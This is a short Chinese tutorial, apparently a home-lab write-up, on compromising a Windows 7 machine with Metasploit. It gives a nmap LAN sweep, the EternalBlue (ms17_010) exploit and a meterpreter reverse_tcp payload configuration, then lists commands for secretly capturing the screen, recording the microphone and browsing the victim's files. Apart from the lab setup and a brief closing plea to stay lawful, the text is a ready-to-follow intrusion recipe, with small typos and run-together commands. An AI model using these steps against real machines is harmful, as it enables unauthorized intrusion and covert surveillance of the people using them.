Metasploit入侵win7系统

• 一：实验环境
• 二：获得信息
• a.获得网络拓扑图
• b.获得主机ip和目标ip

• a.打开控制终端
• b.查找漏洞
• c.进行配置

一：实验环境

主机：安装有Metasploit的kali linux 操作系统
目标：已关闭防火墙的win7系统

二：获得信息

a.获得网络拓扑图

画出网络拓扑图，确定你和目标主机在同一局域网下。

b.获得主机ip和目标ip

1.主机ip：

ifconifg

这里的eth0是你有线连接的ip地址，也是lhost。
2.目标ip：

nmap -nsP 192.168.x.x/24

192.168.x.x/24，通过扫描得到与你相同网段下所有主机IP，加以区分后，最终得到rhost。

三：实施入侵

a.打开控制终端

输入：

msfconsole

b.查找漏洞

控制台输入

search platform:windows 7

这里我使用1037对应的漏洞攻击：控制台输入

use exploit/windows/smb/ms17_010_eternalblue

c.进行配置

set payload/windows/meterpreter/reverse_tcpset lhost 192.168.x.xset rhost 192.168.x.xset lport 2345run

四：对主机进行操作

help命令可以查看有那些命令可以使用，下面是一些立竿见影的：

screenshot  #这个是屏幕截图screenshare	#这个是实时获取另一主机屏幕内容record_mic  #开始录音dir 		#查看目标主机所有文件

五：做个守法的好青年

可能有人会质疑了，你关闭了防火墙再去入侵，相当与没做啊！原谅我还只是个菜鸡中的菜鸡，等我哪一天会绕过防火墙了，我会再写一篇告诉你们的！！！还有，入侵不是给你个IP就行了，真实生活中，肯定有好多意外发生，但电脑的防火墙是可以主动关闭的。